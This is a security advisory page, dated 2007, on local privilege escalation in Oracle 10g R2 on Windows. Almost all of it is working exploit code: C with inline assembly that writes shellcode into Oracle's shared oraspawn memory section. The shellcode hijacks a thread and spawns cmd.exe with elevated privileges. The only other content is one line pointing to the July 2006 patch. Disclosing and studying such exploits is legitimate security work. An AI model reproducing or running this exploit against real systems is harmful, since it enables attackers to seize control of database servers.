Services
Information
Company |
Local Privilege Escalation in Oracle 10g R2
Details The following exploit code allows local privilege escalation on Windows. To run this exploit you must have a local shell on the database server. Example #include #include BOOL InjectShellcode(DWORD oldEIP,CHAR * oSID) { HMODULE hKernel; FARPROC pCreateProc; LPSTR sCommand="cmd.exe"; DWORD dwStrLen; CHAR buff[100]; dwStrLen=strlen(sCommand); hKernel=LoadLibrary("Kernel32.dll"); pCreateProc=GetProcAddress(hKernel,"CreateProcessA"); strcpy(buff, "Global\\*oraspawn_buffer_"); strncat(buff, oSID,50); strcat(buff, "*"); HANDLE hMapFile = OpenFileMapping(FILE_MAP_WRITE, FALSE,buff); if (hMapFile == NULL) { printf("Could not open Shared Section\n\n"); return FALSE; } else printf("Shared Section opened\n"); LPVOID lpMapAddress = MapViewOfFile(hMapFile, FILE_MAP_WRITE,0,0,0); printf("Inserting shellcode...\n"); CHAR sWinSta[]="WinSta0\\Default"; //copy shellcode _asm { pushad lea esi, Shellcode mov edi, lpMapAddress add edi, 0x500 lea ecx, End sub ecx, esi push esi push edi cld rep movsb pop edi pop esi push edi lea ecx, CommandBuf sub ecx, esi add edi, ecx mov esi, sCommand mov ecx, dwStrLen rep movsb mov [edi], 0x00 pop edi mov esi, pCreateProc mov [edi+0x0a], esi mov esi, oldEIP mov [edi+0x0e], esi add edi, 0x2f0 lea esi, sWinSta mov ecx, 0xf cld rep movsb jmp Done Shellcode: jmp Start // this gets overwritten mov ax,0xffff mov ax,0xffff mov ax,0xffff mov ax,0xffff CommandBuf: // this gets overwritten mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 mov dword ptr[eax],0x55555555 Start: call getDelta getDelta: pop edx // Get shellcode/shared section pointer pushad mov eax, edx add eax, 0x200 push eax //LPPROCESS_INFORMATION add eax, 0x200 mov ebx, edx xor bl, bl lea ecx, [ebx+0x2f0] lea ebx, [eax+0x8] mov [ebx], ecx //set windows station and desktop push eax //LPSTARTUPINFO push 0x0 push 0x0 push 0x0 push 0x0 push 0x0 push 0x0 lea eax, [edx-0x47] push eax // Command offset push 0x0 call [edx-0x4f] // Call create process popad push [edx-0x4b] // old thread EIP ret End: Patch Information Apply the patches mentioned in Oracle Critical Patch Update July 2006. © 2007 by Red-Database-Security GmbH - 25-mar-2007 |
Definition Exploit |